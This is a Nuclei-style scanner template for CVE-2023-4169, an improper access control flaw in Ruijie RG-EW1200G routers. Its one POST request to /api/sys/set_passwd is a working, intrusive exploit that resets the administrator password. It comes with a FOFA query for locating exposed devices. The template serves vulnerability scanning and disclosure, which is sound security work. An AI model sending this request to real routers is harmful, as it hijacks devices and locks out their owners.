id: CVE-2023-4169

info:
  name: Ruijie RG-EW1200G Router - Password Reset
  author: DhiyaneshDK
  severity: high
  description: |
    A vulnerability was found in Ruijie RG-EW1200G 1.0(1)B1P5. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /api/sys/set_passwd of the component Administrator Password Handler. The manipulation leads to improper access controls. The attack can be launched remotely.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-4169
    - https://github.com/blakespire/repoforcve/tree/main/RG-EW1200G
    - https://vuldb.com/?ctiid.236185
    - https://vuldb.com/?id.236185
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2023-4169
    cwe-id: CWE-284,NVD-CWE-noinfo
    epss-score: 0.01851
    epss-percentile: 0.86951
    cpe: cpe:2.3:o:ruijie:rg-ew1200g_firmware:1.0\(1\)b1p5:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: ruijie
    product: rg-ew1200g_firmware
    fofa-query: body="app.2fe6356cdd1ddd0eb8d6317d1a48d379.css"
  tags: cve,cve2023,ruijie,router,intrusive
variables:
  password: "{{rand_base(8)}}"

http:
  - method: POST
    path:
      - "{{BaseURL}}/api/sys/set_passwd"

    body: |
      {
      "username":"web",
      "admin_new":"{{password}}"
      }

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"result":"ok"'

      - type: word
        part: header
        words:
          - application/json

      - type: status
        status:
          - 200

# digest: 4b0a00483046022100b733e5c4f06cf6b831ed06f22cdcf3a3f3782b728c28d2d6ff410684ca94504e022100cf4a5048a71f821bf4459376173542f3fb547429f1d43c3b83ccac69bea2d770:922c64590222798bb761d5b6d8e72950